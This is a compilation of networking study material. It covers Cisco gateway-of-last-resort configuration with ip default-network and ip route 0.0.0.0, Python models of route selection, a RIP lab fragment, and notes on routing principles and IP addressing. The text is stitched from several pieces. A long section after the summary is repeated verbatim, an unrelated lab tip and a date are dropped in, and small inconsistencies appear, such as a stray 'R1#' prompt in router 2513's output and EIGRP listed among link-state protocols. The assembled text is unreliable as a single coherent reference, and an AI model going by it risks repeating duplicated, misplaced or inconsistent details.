Unlike the ip default-gateway command, you can use ip default-network when ip routing is enabled on the Cisco router. When you configure ip default-network the router considers routes to that network for installation as the gateway of last resort on the router.

For every network configured with ip default-network, if a router has a route to that network, that route is flagged as a candidate default route. This network diagram displays the routing table taken from router 2513:


2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is not set

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S    198.10.1.0/24 [1/0] via 161.44.192.2

Note the static route to 198.10.1.0 via 161.44.192.2 and that the gateway of last resort is not set. If you configure ip default-network 198.10.1.0, the routing table changes to this:

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2
R1#
2513#show ip protocols
2513#

The gateway of last resort is now set as 161.44.192.2. This result is independent of any routing protocol, as shown by the show ip protocols command at the bottom of the output.

You can add another candidate default route by configuring another instance of ip default-network:

2513#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
2513(config)#ip route 171.70.24.0 255.255.255.0 131.108.99.2
2513(config)#ip default-network 171.70.24.0
2513(config)#^Z

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     171.70.0.0/16 is variably subnetted, 2 subnets, 2 masks
S       171.70.0.0/16 [1/0] via 171.70.24.0
S       171.70.24.0/24 [1/0] via 131.108.99.2
     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2

After the ip default-network command was entered in the output above, the network was not flagged as a default network. The Flag a Default Network section explains why.

Flag a Default Network

Note: The ip default-network command is classful. This means that if the router has a route to the subnet indicated by this command, it installs the route to the major net. At this point neither network has been flagged as the default network. The ip default-network command must be issued again, using the major net, in order to flag the candidate default route.

2513#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
2513(config)#ip default-network 171.70.0.0
2513(config)#^Z

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 171.70.24.0 to network 171.70.0.0

 *   171.70.0.0/16 is variably subnetted, 2 subnets, 2 masks
S*      171.70.0.0/16 [1/0] via 171.70.24.0
S       171.70.24.0/24 [1/0] via 131.108.99.2
     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2

If the original static route had been to the major network, the extra step of configuring the default network twice would not have been necessary.

There are still no IP protocols running here. Without any dynamic protocols running, you can configure your router to choose from a number of candidate default routes based on whether the routing table has routes to networks other than 0.0.0.0/0. The ip default-network command allows you to configure robustness into the selection of a gateway of last resort. Rather than configuring static routes to specific next-hops, you can have the router choose a default route to a particular network by checking in the routing table.

If you lose the route to a particular network, the router selects the other candidate default. You can remove the lost route by removing the static route in the configuration as follows:

2513#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.

2513(config)#no ip route 171.70.24.0 255.255.255.0 131.108.99.2
2513(config)#^Z
2513#
%SYS-5-CONFIG_I: Configured from console by console

After you remove the static route to the default network, the routing table looks like this:

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2
2513#

Use Different Routing Protocols

Gateways of last resort selected using the ip default-network command are propagated differently depending on which routing protocol is propagating the default route. For IGRP and EIGRP to propagate the route, the network specified by the ip default-network command must be known to IGRP or EIGRP. This means the network must be an IGRP- or EIGRP-derived network in the routing table, or the static route used to generate the route to the network must be redistributed into IGRP or EIGRP, or advertised into these protocols using the network command.

RIP advertises a route to 0.0.0.0 if a gateway of last resort is selected using the ip default-network command. This network specified in the ip default-network command need not be explicitly advertised under RIP. For example, note that the gateway of last resort on this router was learned using the combination of the ip route and ip default-network commands. If you enable RIP on this router, RIP advertises a route to 0.0.0.0 (although not to the Ethernet0 network because of split-horizon):

2513(config)#router rip
2513(config-router)#network 161.44.0.0
2513(config-router)#network 131.108.0.0
2513(config-router)#^Z
2513#
%SYS-5-CONFIG_I: Configured from console by console
2513#debug ip rip

*Mar  2 07:39:35.504: RIP: sending v1 update to 255.255.255.255 via Ethernet0 (161.44.192.1)
*Mar  2 07:39:35.508: RIP: build update entries
*Mar  2 07:39:35.508:   network 131.108.0.0 metric 1
*Mar  2 07:39:35.512: RIP: sending v1 update to 255.255.255.255 via Serial0 (131.108.99.1)
*Mar  2 07:39:35.516: RIP: build update entries
*Mar  2 07:39:35.520:   subnet 0.0.0.0 metric 1
*Mar  2 07:39:35.524:   network 161.44.0.0 metric 1

The default route announced using the ip default-network command is not propagated by Open Shortest Path First (OSPF). For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?.

The default route announced using the ip default-network command is not propagated by IS-IS.

ip route 0.0.0.0 0.0.0.0

Creating a static route to network 0.0.0.0 0.0.0.0 is another way to set the gateway of last resort on a router. As with the ip default-network command, using the static route to 0.0.0.0 is not dependent on any routing protocols. However, ip routing must be enabled on the router.

Note: IGRP does not understand a route to 0.0.0.0. Therefore, it cannot propagate default routes created using the ip route 0.0.0.0 0.0.0.0 command. Use the ip default-network command to have IGRP propagate a default route.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?

This is an example of configuring a gateway of last resort using the ip route 0.0.0.0 0.0.0.0 command:

router-3#configure terminal
   Enter configuration commands, one per line. End with CNTL/Z.
   router-3(config)#ip route 0.0.0.0 0.0.0.0 170.170.3.4
   router-3(config)#^Z
   router-3#

   router-3#show ip route
   Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
   D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
   N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
   E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
   i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
   U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

 170.170.0.0/24 is subnetted, 2 subnets
   C 170.170.2.0 is directly connected, Serial0
   C 170.170.3.0 is directly connected, Ethernet0
   S* 0.0.0.0/0 [1/0] via 170.170.3.4
   router-3#
   router-3#

Note: If you configure multiple networks as candidate default routes using the ip default-network command, the network that has the lowest administrative distance is chosen as the network for the gateway of last resort. If all the networks have the same administrative distance then the network listed first in the routing table (show ip route lists the routing table) is chosen as the network for the gateway of last resort. If you use both the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to configure candidate default networks, and the network used by the ip default-network command is known statically, the network defined with the ip default-network command takes precedence and is chosen for the gateway of last resort. Otherwise if the network used by the ip default-network command is derived by a routing protocol, the ip route 0.0.0.0 0.0.0.0 command, which has a lower administrative distance, takes precedence and is chosen for the gateway of last resort. If you use multiple ip route 0.0.0.0 0.0.0.0 commands to configure a default route, traffic is load-balanced over the multiple routes.
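The selection rules above, together with the classful behaviour of ip default-network shown in the 2513 session, can be written down as a small model. The Python below is an added example (not Cisco code) that replays that session step by step and then the precedence between ip default-network and ip route 0.0.0.0 0.0.0.0 candidates. It assumes that the list order of the modelled table stands in for the order in which show ip route lists routes, since that internal ordering is not specified on this page.

```python
"""Model of how IOS chooses the gateway of last resort from ip default-network and
ip route 0.0.0.0 0.0.0.0 candidates. Added example, not Cisco code; assumption: the
list order of RoutingTable.routes stands in for the show ip route display order."""
from dataclasses import dataclass
from ipaddress import IPv4Address, IPv4Network

DEFAULT = IPv4Network("0.0.0.0/0")


def major_net(address):
    """Classful network containing the address (A: /8, B: /16, C: /24)."""
    first_octet = int(IPv4Address(address)) >> 24
    bits = 8 if first_octet < 128 else 16 if first_octet < 192 else 24
    return IPv4Network(f"{address}/{bits}", strict=False)


@dataclass
class Route:
    prefix: IPv4Network
    nexthop: str              # next-hop address, or "connected"
    code: str = "S"           # S static, C connected, R RIP, ...
    ad: int = 1               # administrative distance
    candidate: bool = False   # the '*' flag in show ip route
    derived: bool = False     # major-net route installed by ip default-network


class RoutingTable:
    def __init__(self):
        self.routes = []

    def add(self, route, at=None):
        self.routes.insert(len(self.routes) if at is None else at, route)

    def find(self, prefix):
        return next((r for r in self.routes if r.prefix == prefix), None)

    def ip_default_network(self, address):
        """Classful: a subnet only installs a static route to its major net via that
        subnet; the candidate flag is set only when the major net itself is named."""
        addr = IPv4Address(address)
        major = major_net(address)
        if addr == major.network_address:
            route = self.find(major)
            if route is not None:
                route.candidate = True
            return route is not None
        subnet = next((r for r in self.routes if r.prefix.network_address == addr), None)
        if subnet is not None and self.find(major) is None:
            self.add(Route(major, str(addr), derived=True), at=self.routes.index(subnet))
        return False

    def ip_route_default(self, nexthop, ad=1):
        """ip route 0.0.0.0 0.0.0.0 <nexthop>: always a candidate default."""
        self.add(Route(DEFAULT, nexthop, ad=ad, candidate=True))

    def remove(self, prefix):
        """Withdraw a route, plus any derived major-net route whose next hop lay in it."""
        gone = self.find(prefix)
        self.routes = [r for r in self.routes if r is not gone and
                       not (r.derived and IPv4Address(r.nexthop) in gone.prefix)]

    def gateway_of_last_resort(self):
        """Lowest AD wins; on a tie a default-network candidate beats 0.0.0.0/0,
        and among those the one listed first in the table wins."""
        candidates = [r for r in self.routes if r.candidate]
        if not candidates:
            return None
        best = min(candidates, key=lambda r: (r.ad, r.prefix == DEFAULT, self.routes.index(r)))
        return best.nexthop, str(best.prefix)


def walkthrough():
    """Replay the 2513 session from the text; returns the gateway after each step."""
    t = RoutingTable()
    t.add(Route(IPv4Network("161.44.192.0/24"), "connected", code="C", ad=0))
    t.add(Route(IPv4Network("131.108.99.0/24"), "connected", code="C", ad=0))
    t.add(Route(IPv4Network("198.10.1.0/24"), "161.44.192.2"))
    steps = [("initial", t.gateway_of_last_resort())]
    t.ip_default_network("198.10.1.0")                      # class C: major net == route
    steps.append(("default-network 198.10.1.0", t.gateway_of_last_resort()))
    t.add(Route(IPv4Network("171.70.24.0/24"), "131.108.99.2"), at=0)  # listed first
    t.ip_default_network("171.70.24.0")                     # subnet: installs 171.70.0.0/16 only
    steps.append(("default-network 171.70.24.0", t.gateway_of_last_resort()))
    t.ip_default_network("171.70.0.0")                      # major net: now flagged
    steps.append(("default-network 171.70.0.0", t.gateway_of_last_resort()))
    t.remove(IPv4Network("171.70.24.0/24"))                 # no ip route 171.70.24.0 ...
    steps.append(("no ip route 171.70.24.0", t.gateway_of_last_resort()))
    return steps


def precedence_demo():
    """Static default-network beats 0.0.0.0/0 on equal AD; a RIP-learned one loses."""
    results = []
    for code, ad in (("S", 1), ("R", 120)):
        t = RoutingTable()
        t.add(Route(IPv4Network("198.10.1.0/24"), "161.44.192.2", code=code, ad=ad))
        t.ip_default_network("198.10.1.0")
        t.ip_route_default("10.0.0.1")
        results.append(t.gateway_of_last_resort())
    return results
```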

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.


2513#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
2513(config)#ip default-network 171.70.0.0
2513(config)#^Z

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 171.70.24.0 to network 171.70.0.0

 *   171.70.0.0/16 is variably subnetted, 2 subnets, 2 masks
S*      171.70.0.0/16 [1/0] via 171.70.24.0
S       171.70.24.0/24 [1/0] via 131.108.99.2
     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2

If the original static route had been to the major network, the extra step of configuring the default network twice would not have been necessary.

There are still no IP protocols running here. Without any dynamic protocols running, you can configure your router to choose from a number of candidate default routes based on whether the routing table has routes to networks other than 0.0.0.0/0. The ip default-network command allows you to configure robustness into the selection of a gateway of last resort. Rather than configuring static routes to specific next-hops, you can have the router choose a default route to a particular network by checking in the routing table.

If you lose the route to a particular network, the router selects the other candidate default. You can remove the lost route by removing the static route in the configuration as follows:

2513#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.

2513(config)#no ip route 171.70.24.0 255.255.255.0 131.108.99.2
2513(config)#^Z
2513#
%SYS-5-CONFIG_I: Configured from console by console

After you remove the static route to the default network, the routing table looks like this:

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2
2513#

Use Different Routing Protocols

Gateways of last resort selected using the ip default-network command are propagated differently depending on which routing protocol is propagating the default route. For IGRP and EIGRP to propagate the route, the network specified by the ip default-network command must be known to IGRP or EIGRP. This means the network must be an IGRP- or EIGRP-derived network in the routing table, or the static route used to generate the route to the network must be redistributed into IGRP or EIGRP, or advertised into these protocols using the network command.

RIP advertises a route to 0.0.0.0 if a gateway of last resort is selected using the ip default-network command. This network specified in the ip default-network command need not be explicitly advertised under RIP. For example, note that the gateway of last resort on this router was learned using the combination of the ip route and ip default-network commands. If you enable RIP on this router, RIP advertises a route to 0.0.0.0 (although not to the Ethernet0 network because of split-horizon):

2513(config)#router rip
2513(config-router)#network 161.44.0.0
2513(config-router)#network 131.108.0.0
2513(config-router)#^Z
2513#
%SYS-5-CONFIG_I: Configured from console by console
2513#debug ip rip

*Mar  2 07:39:35.504: RIP: sending v1 update to 255.255.255.255 via Ethernet0 (161.44.192.1)
*Mar  2 07:39:35.508: RIP: build update entries
*Mar  2 07:39:35.508:   network 131.108.0.0 metric 1
*Mar  2 07:39:35.512: RIP: sending v1 update to 255.255.255.255 via Serial0 (131.108.99.1)
*Mar  2 07:39:35.516: RIP: build update entries
*Mar  2 07:39:35.520:   subnet 0.0.0.0 metric 1
*Mar  2 07:39:35.524:   network 161.44.0.0 metric 1

The default route announced using the ip default-network command is not propagated by Open Shortest Path First (OSPF). For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?.

The default route announced using the ip default-network command is not propagated by IS-IS.

ip route 0.0.0.0 0.0.0.0

Creating a static route to network 0.0.0.0 0.0.0.0 is another way to set the gateway of last resort on a router. As with the ip default-network command, using the static route to 0.0.0.0 is not dependent on any routing protocols. However, ip routing must be enabled on the router.

Note: IGRP does not understand a route to 0.0.0.0. Therefore, it cannot propagate default routes created using the ip route 0.0.0.0 0.0.0.0 command. Use the ip default-network command to have IGRP propagate a default route.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?


R1

route1(config)#router rip

route1(config-router)#network 192.168.1.0

route1(config-router)#network 192.168.101.0

R2

route2(config)#router rip

route2(config-router)#network 192.168.1.0

route2(config-router)#network 192.168.100.0

Tip: everything else is the same as in lab 5.

July 21, 2005

Chapter 1: Routing Principles
1.1 Routing basics
Routing is the relay process of delivering an object from one place to another.
The mechanism that learns and maintains knowledge of the network topology is considered the routing function. Moving transit traffic from the inbound interface, across the router, to the outbound interface is a separate function, considered the switching/forwarding function. A routing device must have both the routing and the switching function to act as an effective relay device.
To route, a router must know three things:
- whether support for the protocol suite is enabled;
- the destination network;
- which outgoing interface is the best path to the destination.


A routing protocol uses a metric to decide the best path to a destination. A smaller metric denotes the preferred path; if two or more paths share the same smallest metric, all of them carry traffic equally. Splitting traffic across multiple paths is called load balancing to the destination.

The information needed to perform routing is held in the router's routing table, which is generated by one or more routing protocol processes. The routing table consists of entries, each of which specifies:
- the mechanism by which the route was learned (dynamic or manual);
- the logical destination;
- the administrative distance;
- the metric (a measure of the total "cost" of a path);
- the address of the next-hop relay device (router) toward the destination;
- the age of the routing information;
- the interface associated with the destination network.
The show ip route command displays all of the above.

Default administrative distances are preassigned on the principle that manually configured entries take priority over dynamically learned ones, and routing protocols with more sophisticated metric algorithms take priority over those with simpler ones.

A router generally chooses the path with the smallest metric. In the IP environment of a Cisco router, if several paths have the same lowest metric, load balancing is enabled across them; Cisco supports 4 equal-metric paths by default, and the maximum-paths command raises this to as many as 6 equal-metric paths.
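The selection order described in this section (longest prefix match, then administrative distance, then metric, then equal-cost load balancing capped by maximum-paths), as an added Python example that is not part of the original notes and is not Cisco code. Administrative distance normally decides which protocol's route gets installed for a prefix; the model applies it at lookup time, which yields the same next hops. The RouteEntry class, the lookup function and the sample table are constructed for illustration.

```python
import ipaddress
from dataclasses import dataclass
from typing import List


@dataclass
class RouteEntry:
    prefix: str     # destination network, e.g. "10.1.0.0/16"
    next_hop: str
    ad: int         # administrative distance of the source protocol
    metric: int     # that protocol's metric for the path


def lookup(table: List[RouteEntry], dest: str, maximum_paths: int = 4) -> List[str]:
    """Next hop(s) a router would use for dest.

    1. longest prefix match
    2. lowest administrative distance among routes to that prefix
    3. lowest metric
    4. at most maximum_paths equal-cost next hops (Cisco default 4, up to 6)
    """
    dst = ipaddress.ip_address(dest)
    matches = [r for r in table if dst in ipaddress.ip_network(r.prefix)]
    if not matches:
        return []
    longest = max(ipaddress.ip_network(r.prefix).prefixlen for r in matches)
    matches = [r for r in matches if ipaddress.ip_network(r.prefix).prefixlen == longest]
    best_ad = min(r.ad for r in matches)
    matches = [r for r in matches if r.ad == best_ad]
    best_metric = min(r.metric for r in matches)
    matches = [r for r in matches if r.metric == best_metric]
    # Equal-cost paths share traffic; table order decides which ones are kept
    # when more than maximum_paths of them exist.
    return [r.next_hop for r in matches][:maximum_paths]


# Constructed sample table: a RIP route (AD 120) and an EIGRP route (AD 90) to
# 10.1.0.0/16, plus three RIP routes to 10.2.0.0/16 of which two are equal-cost.
SAMPLE_TABLE = [
    RouteEntry("10.0.0.0/8", "192.0.2.1", 120, 3),
    RouteEntry("10.1.0.0/16", "192.0.2.2", 120, 2),
    RouteEntry("10.1.0.0/16", "192.0.2.3", 90, 30720),
    RouteEntry("10.2.0.0/16", "192.0.2.4", 120, 2),
    RouteEntry("10.2.0.0/16", "192.0.2.5", 120, 2),
    RouteEntry("10.2.0.0/16", "192.0.2.6", 120, 5),
]

if __name__ == "__main__":
    for dest in ("10.1.5.5", "10.9.9.9", "10.2.0.1", "172.16.0.1"):
        print(dest, "->", lookup(SAMPLE_TABLE, dest))
```

Note that the EIGRP route to 10.1.0.0/16 wins despite its much larger metric: metrics are only compared between routes from the same protocol, after administrative distance has decided which protocol's route is used.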

RIP is a routing protocol used in small to medium TCP/IP networks. It uses hop count as its metric, its load balancing is enabled by default, and RIP does not consider bandwidth when choosing the best path.
IGRP is a routing protocol used in medium to large TCP/IP networks. It uses a composite metric that takes bandwidth, delay, reliability, load and maximum transmission unit (MTU) into account, but by default uses only bandwidth and delay. IGRP can also load-balance.
After a router boots, it immediately tries to establish routing relationships with its adjacent routing devices. The purpose of this initial communication is to identify the neighbors, begin communicating, and learn the network structure. The way adjacencies are established and the topology is initially learned differs from one routing protocol to another.
Routing protocols exchange periodic hello messages or periodic routing update packets to keep communication between neighbors alive.
Once the topology is known and the routing table holds the best path to every known destination network, forwarding of data to those destinations can begin.

1.2 Routing protocols

Overview of classful routing
Routing protocols that do not send subnet mask information along with each network address are called classful routing protocols (RIPv1, IGRP).
With a classful routing protocol, all subnets of the same major network (class A, B or C) must use the same subnet mask. A router running a classful routing protocol does one of the following to determine the network portion of a route:
- if the routing update concerns the same major network as the one configured on the receiving interface, the router applies the subnet mask configured on that interface;
- if the routing update concerns a different major network from the one configured on the receiving interface, the router applies the default mask of that address class.

Classful summary routes are generated automatically by classful routing protocols.

Overview of classless routing
Classless routing protocols include Open Shortest Path First (OSPF), EIGRP, RIPv2, Intermediate System-to-Intermediate System (IS-IS) and Border Gateway Protocol version 4 (BGP4).
Using different mask lengths within the same major network is called variable-length subnet masking (VLSM). Classless routing protocols support VLSM, so subnet masks can be chosen to match the host counts of the individual subnets and the host address space is used more fully.

Most distance-vector routing protocols send their periodic, routine routing updates only to directly connected routing devices.

In a pure distance-vector environment a routing update contains the complete routing table. By receiving a neighbor's full routing table, a router can check all known routes and then modify its local table according to the received update. This distance-vector approach to routing is sometimes called "routing by rumor".

Cisco IOS supports several distance-vector routing protocols, including RIPv1, RIPv2 and IGRP. Cisco also supports EIGRP, an advanced distance-vector routing protocol.

Routing protocols are usually associated with the network layer of the protocol suite.

Most distance-vector routing protocols use the Bellman-Ford algorithm to compute routes. EIGRP, an advanced distance-vector protocol, uses the Diffusing Update Algorithm (DUAL).

Comparison of Cisco's IP distance-vector routing protocols

Feature                                  RIPv1         RIPv2         IGRP          EIGRP
Count to infinity                        X             X             X             -
Split horizon                            X             X             X             X
Holddown timers                          X             X             X             -
Triggered updates with route poisoning   X             X             X             X
Load balancing, equal-cost paths         X             X             X             X
Load balancing, unequal-cost paths       -             -             X             X
VLSM support                             -             X             -             X
Routing algorithm                        Bellman-Ford  Bellman-Ford  Bellman-Ford  DUAL
Metric                                   hop count     hop count     composite     composite
Hop-count limit                          15            15            100           100
Scalability                              small         small         medium        large

Note: the hop-count limit of IGRP and EIGRP defaults to 100 but can be configured up to 255.

Link-state routing protocols generate routing update packets only when the network topology changes. When the state of a link changes, the device that detects the change generates a link-state advertisement (LSA) for that link (route). The LSA is then propagated to all neighbors via a special multicast address. Every routing device keeps a copy of the LSA and forwards it to its own neighbors (a process called flooding), then updates its topology database (a table holding the state information of every link in the network). LSA flooding ensures that all routing devices learn of the change, so that they can update their databases and generate an updated routing table that reflects the new topology.

Comparison of Cisco's link-state routing protocols

Feature                                   OSPF                   IS-IS                  EIGRP
Hierarchical topology required            X                      X                      -
Retains knowledge of all possible routes  X                      X                      X
Route summarization, manual               X                      X                      X
Route summarization, automatic            -                      -                      X
Event-triggered announcements             X                      X                      X
Load balancing, equal-cost paths          X                      X                      X
Load balancing, unequal-cost paths        -                      -                      X
VLSM support                              X                      X                      X
Routing algorithm                         Dijkstra               IS-IS                  DUAL
Metric                                    link cost (bandwidth)  link cost (bandwidth)  composite
Hop-count limit                           none                   1024                   100
Scalability                               large                  very large             large

The routing process in each router must keep a loop-free single path to every possible destination logical network. When all routing tables are synchronized and each contains a usable route to every destination network, the network has reached convergence. Convergence is the activity associated with routing table synchronization after a topology change, such as the addition of a new route or a change in the state of an existing one.
Convergence time is the time it takes for all routers in the network to reach a consistent view of the current topology; the size of the network, the routing protocol in use and many configurable timers all affect it.

There are two methods of detecting a failure:
- when the physical or data-link layer fails to receive a certain number (typically 3) of consecutive keepalive messages, the link is considered down;
- when the routing protocol fails to receive a certain number (typically 3) of consecutive hello messages, routing updates or similar messages, the link is considered down.

Most routing protocols have timers that prevent topology loops while a link changes state.

Chapter 2: Extending IP Addresses
The Internet has grown unbelievably fast. This rapid growth has created two major addressing challenges:
- exhaustion of IP addresses;
- growth and manageability of routing tables.

IP addressing solutions:
Slow the consumption of IP addresses and reduce the number of Internet routing table entries by introducing more hierarchy levels into IP addresses. These solutions include:
- subnet masks
- private network address allocation
- network address translation (NAT)
- hierarchical addressing
- variable-length subnet masks (VLSM)
- route summarization
- classless interdomain routing (CIDR)

IP address classes:

First octet (decimal)   Class
1-126                   A
128-191                 B
192-223                 C
224-239                 D
240-255                 E

Class D addresses are not in wide use; they are multicast addresses. Class D multicast addresses used by some routing protocols are:
OSPF: 224.0.0.5 and 224.0.0.6
RIPv2: 224.0.0.9
EIGRP: 224.0.0.10

Hierarchical addressing:
Hierarchical addressing works much like the telephone system. A local exchange does not need to know every telephone number in the country. If the first digit you dial is not 0, the exchange finds the line in its own entries and connects the call; if it is 0, it looks at the area code. For 0791-6221155, say, it hands the call to the Nanchang exchange (0791), which finds line 6221155 and completes the connection. The local exchange therefore does not need to store entries for other cities (and leaves the others something to do). The same principle applies to routers.

Advantages of hierarchical addressing:
- fewer routing entries
Route summarization is a way of representing a group of IP addresses with a single IP address once a hierarchical addressing plan is in place. By summarizing routes we keep the number of routing table entries manageable, which brings the following benefits:
  - more efficient routing (forwarding);
  - fewer CPU cycles spent recomputing the routing table or searching it for a match;
  - lower router memory requirements;
  - faster convergence after network changes;
  - easier troubleshooting.
- efficient address allocation
Hierarchical addressing lets us use all possible addresses, because our address groups are contiguous.

Variable-length subnet masks (VLSM)
VLSM provides the ability to use several subnet masks within one major network (class A, B or C), and to subnet a subnet further. Its advantages are:
- more efficient use of IP addresses: without VLSM, an organization is limited to a single subnet mask within one class A, B or C network number;
- greater route summarization capability: VLSM allows more hierarchy levels in the addressing plan, so routes can be summarized better in the routing table.

Route summarization
Large internetworks contain hundreds or thousands of networks. In such an environment it is generally undesirable for a router to keep all of these routes in its routing table. Route summarization (also called route aggregation or supernetting) reduces the number of routing entries a router must keep, because it represents a series of network numbers with a single summary address.

Another advantage of route summarization in large, complex networks is that it shields other routers from topology changes.

Route summarization is feasible and most effective only with a correct addressing plan; in a subnetted environment it works best when the network addresses form contiguous blocks whose sizes are powers of two.

